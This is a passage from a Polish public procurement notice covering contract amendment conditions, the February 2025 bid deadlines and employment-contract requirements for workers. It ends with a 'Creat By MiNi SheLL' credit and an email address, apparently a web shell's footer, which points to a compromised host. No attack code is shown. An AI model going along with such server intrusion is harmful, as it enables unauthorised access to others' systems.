umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej<br/>zapisów przez strony.<br/>3) Wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy zamawiający uzna, że osoby te nie wykonują<br/>należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień składania ofert warunki określone w specyfikacji, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku<br/>zamawiającego,<br/>4) Zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy a także z np. wystąpienia zwłoki w<br/>wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń,<br/>5) Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:<br/>a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem,<br/>b) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana numeru rachunku bankowego),<br/>c) zmiany danych teleadresowych,<br/>d) zmiana obowiązującej stawki VAT,<br/>6. W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt.5 termin realizacji przedmiotu umowy może<br/>ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie<br/>dłużej jednak niż o okres trwania tych okoliczności.<br/>7. Zamawiający dopuszcza możliwość dokonania zmian w zakresie powierzenia części lub całości wykonania przedmiotu<br/>zamówienia podwykonawcom, poprzez:<br/>1) w przypadku nie przewidzenia podwykonawców w momencie składania oferty, wprowadzenie ich podczas realizacji<br/>zamówienia,<br/>2) rozszerzenie kręgu podwykonawców,<br/>3) zmianę lub wykreślenie podwykonawcy,<br/>4) zmianę zakresu prac powierzonych podwykonawcy,<br/>8. Warunki zmian:<br/>1) inicjowanie zmian – na wniosek wykonawcy lub Zamawiającego,<br/>2) uzasadnienie zmian – prawidłowa realizacja przedmiotu umowy,<br/>3) forma zmian – aneks do umowy w formie pisemnej pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-17 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje zwrotu kosztów postępowania.<br/>2. Zamawiający nie wymaga wizji lokalnej.<br/>3. Dla przedmiotowego postępowania nie ma zastosowania żadna z sytuacji określonych w art. 65 ust 1, art. 66 i art. 69<br/>pzp. W związku z powyższym nie zachodzi konieczność komunikowania się z Wykonawcą w sposób inny niż przewidziany<br/>w niniejszej SWZ.<br/>4. Zamawiający nie przewiduje możliwości udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy.<br/>5. Stosownie do treści art. 95 ustawy Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę<br/>lub Podwykonawcę w rozumieniu przepisów art. 22 ust.1 ustawy z dnia 26 czerwca 1974 r. – Kodeks Pracy (Dz.U. z 2020 r.,<br/>poz. 1320 z późń.zm.), osób wykonujących niezbędne czynności dla realizacji niniejszego przedmiotu zamówienia, które<br/>wskazano w SWZ oraz załącznikach do SWZ tj. osoby wykonujące prace fizyczne związane z robotami budowlanymi w<br/>szczególności związane z obsługą maszyn budowlanych, montowaniem urządzeń, robotami nie wymagającymi kwalifikacji,<br/>za wyjątkiem osób pełniących samodzielne funkcje techniczne w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r.<br/>Prawo budowlane (Dz. U. z 2018 r., poz. 1202.), osób wykonujących czynności wymagających posiadania uprawnień<br/>zawodowych w dziedzinie geodezji i kartografii w rozumieniu ustawy z dnia 17 maja 1989r. Prawo geodezyjne i<br/>kartograficzne (t.j. Dz. U. z 2020 r., poz. 2052) oraz osób prowadzących działalność gospodarczą. Pozostałe wymogi<br/>wynikające z art. 95 ustawy zostały określone w istotnych postanowieniach przyszłej umowy, które stanowią załącznik do<br/>SWZ. Ustalenie wymiaru czasu pracy oraz liczby osób Zamawiający pozostawia w gestii Wykonawcy.<br/>a) Wykonawca w terminie 14 dni od podpisania umowy przekaże Zamawiającemu, ujęte w formie wykazu informacje o<br/>osobach zatrudnionych. Wykaz powinien zawierać imię i nazwisko pracownika, wymiar zatrudnienia oraz informację o<br/>wykonywanych czynnościach/stanowisko pracy. Wraz z wykazem Wykonawca przekazuje oświadczenie, że wymienione<br/>osoby zatrudnione są na podstawie umowy o pracę.<br/>2) Uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagań związanych z zatrudnieniem<br/>osób:<br/>a) Zamawiający zastrzega sobie prawo przeprowadzenia kontroli na miejscu wykonywania zamówienia, przez cały okres<br/>realizacji wykonywanych przez Wykonawcę czynności, w celu weryfikacji, czy osoby wykonujące czynności przy realizacji<br/>zamówienia są osobami wskazanymi przez Wykonawcę. W celu weryfikacji zatrudnienia przez Wykonawcę lub<br/>Podwykonawcę na podstawie umowy o pracę Zamawiający na podstawie art. 438 ust. 2 ustawy Pzp może żądać<br/>przedłożenia :<br/>- oświadczenia zatrudnionego pracownika<br/>- oświadczenia Wykonawcy lub Podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę,<br/>- poświadczonej za zgodność z oryginałem kopii umowy o pracę zatrudnionego pracownika,<br/>- innych dokumentów zawierających informacje niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę w tym<br/>zawierających dane osobowe- w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę,<br/>rodzaj umowy o pracę i zakres obowiązków pracownika.<br/>4) Sankcje z tytułu niespełnienia wymagań, o których mowa w art. 95 ust 1 pzp:<br/>a) Zamawiającemu przysługiwać będzie prawo naliczenia Wykonawcy kar umownych w wysokości 0,1% ceny ofertowej<br/>brutto w każdym przypadku stwierdzenia uchybienia;<br/>b) Niezłożenie przez Wykonawcę w wyznaczonych przez Zamawiającego terminach żądanych dowodów, w celu<br/>potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę<br/>traktowane będzie jako niespełnienie przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o<br/>pracę osób wykonujących pracę przy realizacji zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com